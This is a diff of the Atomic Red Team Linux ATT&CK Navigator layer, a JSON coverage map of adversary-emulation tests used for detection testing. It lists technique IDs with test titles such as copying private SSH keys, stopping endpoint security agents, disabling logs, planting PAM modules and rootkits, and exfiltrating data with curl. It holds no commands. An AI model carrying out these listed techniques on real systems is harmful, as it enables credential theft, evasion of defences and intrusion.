Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Discover Private SSH Keys\n- Copy Private SSH Keys with CP\n- Copy Private SSH Keys with CP (freebsd)\n- Copy Private SSH Keys with rsync\n- Copy Private SSH Keys with rsync (freebsd)\n- Copy the users 
GnuPG directory with rsync\n- Copy the users GnuPG directory with rsync (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.007","score":1,"enabled":true,"comment":"\n- Cat the contents of a Kubernetes service account token file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on CentOS/RHEL\n- Install root CA on FreeBSD\n- Install root CA on Debian/Ubuntu\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1555","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.003","score":1,"enabled":true,"comment":"\n- LaZagne.py - Dump Credentials from Firefox Browser\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1556","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"comment":"\n- Malicious PAM rule\n- Malicious PAM rule (freebsd)\n- Malicious PAM module\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1560","score":9,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":5,"enabled":true,"comment":"\n- Data Compressed - nix - zip\n- Data Compressed - nix - gzip Single File\n- Data Compressed - nix - tar Folder or File\n- Data Encrypted with zip and gpg symmetric\n- Encrypts collected data with AES-256 and Base64\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"comment":"\n- Compressing data using GZip in Python (FreeBSD/Linux)\n- Compressing data using bz2 in Python (FreeBSD/Linux)\n- Compressing data using zipfile in Python (FreeBSD/Linux)\n- Compressing data using tarfile in Python (FreeBSD/Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":43,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Disable journal logging via systemctl utility\n- Disable journal logging via sed utility\n"},{"techniqueID":"T1562.001","score":11,"enabled":true,"comment":"\n- Disable syslog\n- Disable syslog (freebsd)\n- Disable Cb Response\n- Disable SELinux\n- Stop Crowdstrike Falcon on Linux\n- Clear History\n- Suspend History\n- Reboot Linux Host via Kernel System Request\n- Clear Pagging Cache\n- Disable Memory Swap\n- Tamper with Defender ATP on Linux/MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"comment":"\n- Disable history collection\n- Disable history collection (freebsd)\n- Mac HISTCONTROL\n- Clear bash history\n- Setting the HISTCONTROL environment variable\n- Setting the HISTFILESIZE environment 
variable\n- Setting the HISTSIZE environment variable\n- Setting the HISTFILE environment variable\n- Setting the HISTFILE environment variable (freebsd)\n- Setting the HISTIGNORE environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":13,"enabled":true,"comment":"\n- Stop/Start UFW firewall\n- Stop/Start Packet Filter\n- Stop/Start UFW firewall systemctl\n- Turn off UFW logging\n- Add and delete UFW firewall rules\n- Add and delete Packet Filter rules\n- Edit UFW firewall user.rules file\n- Edit UFW firewall ufw.conf file\n- Edit UFW firewall sysctl.conf file\n- Edit UFW firewall main configuration file\n- Tail the UFW firewall log file\n- Disable iptables\n- Modify/delete iptables firewall rules\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":4,"enabled":true,"comment":"\n- Auditing Configuration Changes on Linux Host\n- Auditing Configuration Changes on FreeBSD Host\n- Logging Configuration Changes on Linux Host\n- Logging Configuration Changes on FreeBSD Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":3,"enabled":true,"comment":"\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":1,"enabled":true,"comment":"\n- Create a hidden file in a hidden directory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1569","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":1,"enabled":true,"comment":"\n- psexec.py (Impacket)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1574","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.006","score":2,"enabled":true,"comment":"\n- Shared Library Injection via /etc/ld.so.preload\n- Shared Library Injection via LD_PRELOAD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1614","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":4,"enabled":true,"comment":"\n- Discover System Language with locale\n- Discover System Language with localectl\n- 
Discover System Language by locale file\n- Discover System Language by Environment Variable Query\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team (Linux)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Linux"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"comment":"\n- Dump individual process memory with sh (Local)\n- Dump individual process memory with sh on FreeBSD (Local)\n- Dump individual process memory with Python (Local)\n- Capture Passwords with MimiPenguin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"comment":"\n- Access /etc/shadow (Local)\n- Access /etc/master.passwd (Local)\n- Access /etc/passwd (Local)\n- Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat\n- Access /etc/{shadow,passwd,master.passwd} with shell builtins\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Find and dump sqlite databases (Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1007","score":1,"enabled":true,"comment":"\n- 
System Service Discovery - systemctl/service\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"comment":"\n- Loadable Kernel Module based Rootkit\n- Loadable Kernel Module based Rootkit\n- dynamic-linker based rootkit (libprocesshider)\n- Loadable Kernel Module based Rootkit (Diamorphine)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":1,"enabled":true,"comment":"\n- System Network Configuration Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":6,"enabled":true,"comment":"\n- Remote System Discovery - arp nix\n- Remote System Discovery - sweep\n- Remote System Discovery - ip neighbour\n- Remote System Discovery - ip route\n- Remote System Discovery - netstat\n- Remote System Discovery - ip tcp_metrics\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Decode base64 Data into Script\n"},{"techniqueID":"T1027.001","score":2,"enabled":true,"comment":"\n- Pad Binary to Change Hash - Linux/macOS dd\n- Pad Binary to Change Hash using truncate command - Linux/macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":2,"enabled":true,"comment":"\n- Binary simply packed by UPX (linux)\n- Binary packed by UPX, with modified headers (linux)\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":3,"enabled":true,"comment":"\n- C compile\n- CC compile\n- Go compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"comment":"\n- Data Transfer Size Limits\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":1,"enabled":true,"comment":"\n- System Owner/User Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":1,"enabled":true,"comment":"\n- Masquerading as FreeBSD or Linux crond process.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":1,"enabled":true,"comment":"\n- linux rename /proc/pid/comm using prctl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Execute a process from a directory masquerading as the current parent directory.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":1,"enabled":true,"comment":"\n- Space After Filename\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.004","score":2,"enabled":true,"comment":"\n- rc.common\n- rc.local\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1040","score":8,"enabled":true,"comment":"\n- Packet Capture Linux using tshark or tcpdump\n- Packet Capture FreeBSD using tshark or tcpdump\n- Packet Capture FreeBSD using /dev/bpfN with sudo\n- Filtered Packet Capture FreeBSD using /dev/bpfN with sudo\n- Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo\n- Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo\n- Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo\n- Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":2,"enabled":true,"comment":"\n- Port Scan\n- Port Scan Nmap\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- Exfiltration Over Alternative Protocol - SSH\n- Exfiltration Over Alternative Protocol - SSH\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl freebsd,linux or macos\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":3,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - DNS\n- Python3 http.server\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":1,"enabled":true,"comment":"\n- System Network Connections Discovery FreeBSD, Linux & MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At - Schedule a job\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"comment":"\n- Cron - Replace crontab with referenced file\n- Cron - Add script to all cron subfolders\n- Cron - Add script to /etc/cron.d folder\n- Cron - Add script to /var/spool/cron/crontabs/ folder\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"comment":"\n- Create Systemd Service and Timer\n- Create a user level transient systemd service and timer\n- Create a system level transient systemd service and timer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1056","score":6,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":6,"enabled":true,"comment":"\n- Living off the land Terminal Input Capture on Linux with pam.d\n- Logging bash history to syslog\n- Logging sh history to syslog/messages\n- Bash session based keylogger\n- SSHD PAM keylogger\n- Auditd keylogger\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1057","score":1,"enabled":true,"comment":"\n- Process Discovery - ps\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"comment":"\n- Create and Execute Bash Shell Script\n- Command-Line Interface\n- Harvest SUID executable files\n- LinEnum tool execution\n- New script file in the tmp directory\n- What shell is running\n- What shells are available\n- Command line scripts\n- Obfuscated command line scripts\n- Change login shell\n- Environment variable scripts\n- Detecting pipe-to-shell\n- Current kernel information enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"comment":"\n- Execute shell script via python's command mode arguement\n- Execute Python via scripts\n- Execute Python via Python executables\n- Python pty module and spawn function used to spawn sh or bash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":1,"enabled":true,"comment":"\n- Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.002","score":9,"enabled":true,"comment":"\n- rm -rf\n- rm -rf\n- Truncate system log files via truncate utility (freebsd)\n- Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd)\n- Overwrite FreeBSD system log via echo utility\n- Delete system log files via unlink utility (freebsd)\n- Delete system journal logs via rm and journalctl utilities\n- Overwrite Linux Mail Spool\n- Overwrite Linux Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":9,"enabled":true,"comment":"\n- Clear Bash history (rm)\n- Clear Bash history (echo)\n- Clear Bash history (cat dev/null)\n- Clear Bash history (ln dev/null)\n- Clear Bash history (truncate)\n- Clear history of a bunch of shells\n- Clear and Disable Bash History Logging\n- Use Space Before Command to Avoid Logging to History\n- Disable Bash History Logging with SSH -T\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":4,"enabled":true,"comment":"\n- Delete a single file - 
FreeBSD/Linux/macOS\n- Delete an entire folder - FreeBSD/Linux/macOS\n- Overwrite and delete a file with shred\n- Delete Filesystem - Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Set a file's access timestamp\n- Set a file's modification timestamp\n- Set a file's creation timestamp\n- Modify file timestamps using reference file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Linux\n- Copy and Modify Mailbox Data on Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":1,"enabled":true,"comment":"\n- Malicious User Agents - Nix\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1074","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":1,"enabled":true,"comment":"\n- Stage data from Discovery.sh\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.003","score":5,"enabled":true,"comment":"\n- Create local account (Linux)\n- 
Reactivate a locked/expired account (Linux)\n- Reactivate a locked/expired account (FreeBSD)\n- Login as nobody (Linux)\n- Login as nobody (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":8,"enabled":true,"comment":"\n- List OS Information\n- Linux VM Check via Hardware\n- Linux VM Check via Kernel Modules\n- FreeBSD VM Check via Kernel Modules\n- Hostname Discovery\n- Environment variables discovery on freebsd, macos and linux\n- Linux List Kernel Modules\n- FreeBSD List Kernel Modules\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":2,"enabled":true,"comment":"\n- Nix File and Directory Discovery\n- Nix File and Directory Discovery 2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":6,"enabled":true,"comment":"\n- Enumerate all accounts (Local)\n- View sudoers access\n- View accounts with UID 0\n- List opened files by user\n- Show if a user account has ever logged in remotely\n- Enumerate users and groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":1,"enabled":true,"comment":"\n- Active Directory Domain Search\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- Connection Proxy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":1,"enabled":true,"comment":"\n- Tor Proxy Usage - Debian/Ubuntu/FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"comment":"\n- Modify SSH Authorized Keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":8,"enabled":true,"comment":"\n- rsync remote file copy (push)\n- rsync remote file copy (pull)\n- scp remote file copy (push)\n- scp remote file copy (pull)\n- sftp remote file copy (push)\n- sftp remote file copy (pull)\n- whois file download\n- Linux Download File and Run\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":3,"enabled":true,"comment":"\n- SUDO Brute Force - Debian\n- SUDO Brute Force - Redhat\n- SUDO Brute Force - FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.004","score":2,"enabled":true,"comment":"\n- SSH Credential Stuffing From Linux\n- SSH Credential Stuffing From 
FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1113","score":4,"enabled":true,"comment":"\n- X Windows Capture\n- X Windows Capture (freebsd)\n- Capture Linux Desktop using Import Tool\n- Capture Linux Desktop using Import Tool (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1115","score":1,"enabled":true,"comment":"\n- Add or copy content to clipboard with xClip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1124","score":1,"enabled":true,"comment":"\n- System Time Discovery in FreeBSD/macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1132","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":2,"enabled":true,"comment":"\n- Base64 Encoded data.\n- Base64 Encoded data (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1135","score":2,"enabled":true,"comment":"\n- Network Share Discovery - linux\n- Network Share Discovery - FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a user account on a Linux system\n- Create a user account on a FreeBSD system\n- Create a new user in Linux with 
`root` UID and GID.\n- Create a new user in FreeBSD with `root` GID.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":2,"enabled":true,"comment":"\n- Active Directory Create Admin Account\n- Active Directory Create User Account (Non-elevated)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1140","score":8,"enabled":true,"comment":"\n- Base64 decoding with Python\n- Base64 decoding with Perl\n- Base64 decoding with shell utilities\n- Base64 decoding with shell utilities (freebsd)\n- FreeBSD b64encode Shebang in CLI\n- Hex decoding with shell utilities\n- Linux Base64 Encoded Shebang in CLI\n- XOR decoding and command execution using Python\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":3,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine password complexity policy - Ubuntu\n- Examine password complexity policy - FreeBSD\n- Examine password complexity policy - CentOS/RHEL 7.x\n- Examine password complexity policy - CentOS/RHEL 6.x\n- Examine password expiration policy - All Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":2,"enabled":true,"comment":"\n- List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux\n- List Google Chromium Bookmark JSON Files on FreeBSD\n","links":[{"label":"View 
